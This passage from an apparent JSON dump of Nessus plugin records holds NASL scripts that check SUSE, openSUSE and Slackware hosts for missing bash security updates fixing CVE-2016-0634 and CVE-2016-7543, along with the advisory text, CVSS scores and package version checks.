"SUSE_SU-2018-1398-2.NASL", "href": "https://www.tenable.com/plugins/nessus/118257", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1398-2.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118257);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/07\");\n\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\");\n\n script_name(english:\"SUSE SLES12 Security Update : bash (SUSE-SU-2018:1398-2)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for bash fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2016-7543: A code execution possibility via SHELLOPTS+PS4 variable\nwas fixed (bsc#1001299)\n\nCVE-2016-0634: Arbitrary code execution via malicious hostname was\nfixed (bsc#1000396)\n\nNon-security issues fixed: Fix repeating self-calling of traps due the\ncombination of a non-interactive shell, a trap handler for SIGINT, an\nexternal process in the trap handler, and a SIGINT within the trap\nafter the external process runs. (bsc#1086247)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1000396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1001299\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1086247\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0634/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7543/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181398-2/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f6ebc8c4\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2018-977=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-7543\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"bash-4.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"bash-debugsource-4.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libreadline6-6.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-6.3-83.10.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:39:40", "description": "This update for bash fixes the following security issues :\n\n - CVE-2016-7543: Local attackers could have executed arbitrary commands via specially crafted SHELLOPTS+PS4 variables (bsc#1001299)\n\n - CVE-2016-0634: Malicious hostnames could have allowed arbitrary command execution when $HOSTNAME was expanded in the prompt (bsc#1000396)\n\nThis update also fixes the following bugs :\n\n - fix a crash found during debugging boo#971410\n\n - boo#976776: crash if ~/.bash_history is empty (boo#976776)", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-04T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-2016-1260)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-1260.NASL", "href": "https://www.tenable.com/plugins/nessus/94530", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1260.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94530);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-2016-1260)\");\n script_summary(english:\"Check for the openSUSE-2016-1260 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for bash fixes the following security issues :\n\n - CVE-2016-7543: Local attackers could have executed\n arbitrary commands via specially crafted SHELLOPTS+PS4\n variables (bsc#1001299)\n\n - CVE-2016-0634: Malicious hostnames could have allowed\n arbitrary command execution when $HOSTNAME was expanded\n in the prompt (bsc#1000396)\n\nThis update also fixes the following bugs :\n\n - fix a crash found during debugging boo#971410\n\n - boo#976776: crash if ~/.bash_history is empty\n (boo#976776)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1000396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1001299\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=976776\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-4.2-75.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-debuginfo-4.2-75.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-debugsource-4.2-75.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-devel-4.2-75.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-lang-4.2-75.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-loadables-4.2-75.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-loadables-debuginfo-4.2-75.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libreadline6-6.2-75.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libreadline6-debuginfo-6.2-75.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"readline-devel-6.2-75.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-75.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-75.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-75.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-75.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo-32bit / bash-debuginfo / bash-debugsource / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:38:12", "description": "This update for bash fixes the following issues :\n\n - CVE-2016-7543: Local attackers could have executed arbitrary commands via specially crafted SHELLOPTS+PS4 variables. (bsc#1001299)\n\n - CVE-2016-0634: Malicious hostnames could have allowed arbitrary command execution when $HOSTNAME was expanded in the prompt. (bsc#1000396) The following bugs were fixed :\n\n - bsc#971410: Scripts could terminate unexpectedly due to mishandled recursive traps.\n\n - bsc#959755: Clarify that the files /etc/profile as well as /etc/bash.bashrc may source other files as well even if the bash does not.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-30T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : bash (SUSE-SU-2017:0302-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:bash", "p-cpe:/a:novell:suse_linux:bash-doc", "p-cpe:/a:novell:suse_linux:libreadline5", "p-cpe:/a:novell:suse_linux:readline-doc", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2017-0302-1.NASL", "href": "https://www.tenable.com/plugins/nessus/96868", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0302-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96868);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\");\n\n script_name(english:\"SUSE SLES11 Security Update : bash (SUSE-SU-2017:0302-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for bash fixes the following issues :\n\n - CVE-2016-7543: Local attackers could have executed\n arbitrary commands via specially crafted SHELLOPTS+PS4\n variables. (bsc#1001299)\n\n - CVE-2016-0634: Malicious hostnames could have allowed\n arbitrary command execution when $HOSTNAME was expanded\n in the prompt. (bsc#1000396) The following bugs were\n fixed :\n\n - bsc#971410: Scripts could terminate unexpectedly due to\n mishandled recursive traps.\n\n - bsc#959755: Clarify that the files /etc/profile as well\n as /etc/bash.bashrc may source other files as well even\n if the bash does not.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1000396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1001299\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=959755\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0634/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7543/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170302-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b287ec18\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-bash-12959=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-bash-12959=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-bash-12959=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreadline5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:readline-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libreadline5-32bit-5.2-147.29.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libreadline5-32bit-5.2-147.29.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bash-3.2-147.29.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bash-doc-3.2-147.29.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libreadline5-5.2-147.29.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"readline-doc-5.2-147.29.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:35:36", "description": "New bash packages are available for Slackware 13.1, 13.37, 14.0, 14.1, and 14.2 to fix security issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-11T00:00:00", "type": "nessus", "title": "Slackware 13.1 / 13.37 / 14.0 / 14.1 / 14.2 : bash (SSA:2017-251-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:bash", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.2"], "id": "SLACKWARE_SSA_2017-251-01.NASL", "href": "https://www.tenable.com/plugins/nessus/103089", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2017-251-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103089);\n script_version(\"3.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\");\n script_xref(name:\"SSA\", value:\"2017-251-01\");\n\n script_name(english:\"Slackware 13.1 / 13.37 / 14.0 / 14.1 / 14.2 : bash (SSA:2017-251-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New bash packages are available for Slackware 13.1, 13.37, 14.0,\n14.1, and 14.2 to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.503015\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?438a1b11\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.1\", pkgname:\"bash\", pkgver:\"4.1.017\", pkgarch:\"i486\", pkgnum:\"2_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.1.017\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.1\")) 